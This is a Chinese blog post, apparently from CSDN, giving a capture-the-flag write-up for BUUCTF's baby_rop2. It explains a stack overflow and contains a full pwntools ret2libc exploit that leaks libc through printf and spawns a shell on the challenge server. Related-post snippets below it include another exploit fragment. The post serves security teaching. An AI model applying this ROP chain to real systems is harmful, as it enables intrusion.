buuctf27 [HarekazeCTF2019]baby_rop2 1

已于 2024-02-26 22:26:05 修改
阅读量140 收藏
点赞数
文章标签: 网络安全
于 2023-11-20 14:10:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74861133/article/details/134506014
版权

1.checksec

在这里插入图片描述
只开启了NX保护

2.ida

在这里插入图片描述
溢出点在v5 = read(0, buf, 0x100uLL);处,buf离栈底的距离为0x28(64位ebp占8位)。
shift+f12没有发现后门函数,故应构造rop链,发现函数调用了printf函数与read函数,故可使用printf函数的plt表调用printf函数以泄露read函数的真实地址,64位elf通过寄存器传递参数,使用命令:ROPgadget --binary pwn27 --only 'pop|ret’查看返回地址
在这里插入图片描述
其中400733 : pop rdi ; ret
400731 : pop rsi ; pop r15 ; ret比较关键
因为寄存器传参的前2个分别是rdi,rsi
构造printf函数的2个参数时只需要2个寄存器
但是使用printf函数打印地址时需要有一个带有%s的字符串,即可寻到"Welcome to the Pwn World again, %s!\n"的地址将其放入printf的第一个参数

exp

from pwn import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')

r = remote("node4.buuoj.cn",25083)
#r = process("./pwn27")
elf = ELF("./pwn27")
libc = ELF("./ubantu1664.so")

#params
rdi_addr = 0x400733
rsi_r15_addr = 0x400731
main_addr = elf.symbols['main']
printf_plt=elf.plt['printf']
read_got=elf.got['read']
format_str = 0x400770

#print(p64(format_str))
#attack
payload=b'a'*(0x20+8) + p64(rdi_addr) + p64(format_str) + p64(rsi_r15_addr) + p64(read_got) + p64(0) + p64(printf_plt) + p64(main_addr)

r.sendline(payload)

read_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
#print("read_addr: " + hex(read_addr))

#libc
base_addr = read_addr - libc.symbols['read']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b'/bin/sh'))
print("system_addr: " + (hex(system_addr)))
print("bin_sh_addr: " + (hex(bin_sh_addr)))

#attack2
payload=b'a'*(0x20+8) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
#r.recv()
r.sendline(payload)

r.interactive()

最后拿到shell后还不能直接cat flag需使用命令find -name flag寻到flag的文件所在的位置
在这里插入图片描述
进入那个文件cat flag

曾经满眼皆是她
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
arm64_rop_exploit:Arm64返回定向编程(ROP)漏洞
03-02
arm64_rop_exploit arm64 rop小工具二进制文件,用于将arm64反向外壳程序代码映射到内存中并执行代码 这仅适用于目标arm64设备。 用于将rop小工具映射到内存中并从libc库执行shell代码的源代码。 在运行Ubuntu 18.04.4 LTS(GNU / Linux 4.15.0-1062-raspi2 aarch64)的Raspberry Pi上测试了arm64代码。 执照 有关详细信息,请参阅文件。 rop.py 关于 该项目将研究漏洞的利用以及面向收益的编程的使用。 这将建立在注入外壳程序代码以进行开发的基础上。 该项目的创举来自以下博客: 但是,该博客有一些非常有用的小工具,但找不到该博客所指向的解决方案。 因此,决定以此为基础,并使用该rop博客的一些小工具来设计项目。 在受DEP(数据执行保护)保护的过程中-不应同时存在可执行和可写的
pwn学习资料整理——ROP技术(pwn_rop2
08-30
pwn学习资料整理——ROP技术(pwn_rop2
STM8_Unlock_Flash_ROP_issue_ROPCLEAR_unlock_stm8s003_stm8s103_
10-03
STM8S103
BUUCTF(pwn)[HarekazeCTF2019]baby_rop2 泄露libc基址,rop,利用gadget
半岛铁盒的博客
08-12 600
64位,开了nx保护 运行了一下程序 buf的大小是0x20,但是读入的时候读入的是0x100,会造成溢出,我们要想办法覆盖返回地址为” system(‘/bin/sh’) 利用read函数,去泄露程序的libc基址,然后去获得system和/bin/sh字符串的地址 然后造成溢出,将返回地址覆盖为system(‘/bin/sh’) from pwn import * from LibcSearcher import * context.log_level='debug' p=remote('n
[HarekazeCTF2019]baby_rop2 1(含libc.so.6文件)(一些问题有待解决)
weixin_52111404的博客
12-11 690
题时遇到了不少问题,有些还没有得到解决,在此进行记录
[HarekazeCTF2019]baby_rop
m0sway的博客
03-26 540
[HarekazeCTF2019]baby_rop WriteUp BUU_PWN
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2549
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
BUUCTF [HarekazeCTF2019]baby_rop
小白垃圾笔记2
05-13 184
不过因为这是64位程序,所以我们需要找一些东西的地址。main函数里直接是漏洞 ,第6行存在栈溢出。/bin/sh (当作system的参数)小白做题垃圾笔记,不建议阅读。system(调用系统函数·)pop rdi (用来传参)一次打不通可以多打几次。ret(用来栈对齐)
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
基于ROP的SAMPLE开发代码,属于通信框架的一部分。ROP是淘宝提供的一种开发协议框架,底层基于NETTY。
hackme.inndy.tw的rop2题目
10-15
这是https://hackme.inndy.tw/scoreboard/的rop2题目如果网站被墙或者关闭请从这里下载
[BUUCTF]PWN——[HarekazeCTF2019]baby_rop2
最新发布
2302_79899078的博客
01-19 418
小萌新一个,仅供参考。
[HarekazeCTF2019]baby_rop wp (python3)
Kata_Jhin的博客
03-08 163
[HarekazeCTF2019]baby_rop wp (python3)
BUU-[HarekazeCTF2019]baby_rop
qq_45771413的博客
04-27 1366
查看保护 IDA scanf没限制输入长度,这里可以溢出v4 寻找system和敏感字符串: 都找到了,看来可以缝合缝合了。 解题 这次还是rop,但是还是查阅了相关资料,比第一次做时理解要深刻点。也会用寻找ret返回的工具: ROPgadget ROP相关概念: ROP就是使用返回指令ret连接代码的一种技术 (同理还可以使用jmp系列指令和call指令,有时候也会对应地成为JOP/COP)。 一个程序中必然会存在函数,而有函数就会有ret指令。 而ret指令的本质是pop eip,即把当前栈顶的内
CTF buuoj pwn-----[HarekazeCTF2019]baby_rop
bing_Max的博客
10-11 1890
exp from pwn import * sh = remote('node4.buuoj.cn', 342414) # 连接一个远程靶机。 elf = ELF('./babyrop') # elf函数调用,elf可以 bin_sh_addr = 0x601048 system_addr = 0x601060 pop_rdi_addr = 0x400683 payload = b'a'*0x10 + b'a'*8 + p64(pop_rdi_addr)+p64(bin_sh_addr)+p64(
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 621
pwn 64位 泄露libc版本
[BUUCTF]PWN——[HarekazeCTF2019]baby_rop
BangSen1的博客
03-29 258
例行检查,64位,开启NX保护。 运行一下 用IDA打开。shift+f12检索字符串,看到了system和/bin/sh shelladdr=0x601048 systemaddr=0x400496 查看主函数,v4的输入没有长度限制 ,可以造成溢出,由于程序 是64位的,所以传参会用到寄存器 当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时,后面的依次从 “右向左” 放入栈中。 找到rdi的位置。 rdiaddr=0x
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8262
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值